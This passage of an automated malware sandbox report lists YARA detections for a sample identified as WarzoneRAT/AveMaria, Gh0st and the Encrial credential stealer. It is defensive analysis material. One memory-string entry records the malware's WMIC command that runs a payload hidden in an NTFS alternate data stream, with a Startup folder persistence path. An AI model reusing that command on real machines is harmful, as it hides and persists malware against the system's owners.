            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: WMIC.exe, 00000009.00000002.306832664.000001FA873D0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C:\Windows\System32\Wbem\WMIC.exewmic process call create '"C:\ProgramData:ApplicationData"'wmic process call create '"C:\ProgramData:ApplicationData"'Winsta0\Default
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3.3.windowupdate.exe.1084250.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.1084250.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.9.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.9.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ee89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ee89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea4ff8.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea4ff8.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a789af.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a789af.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.8.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.8.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
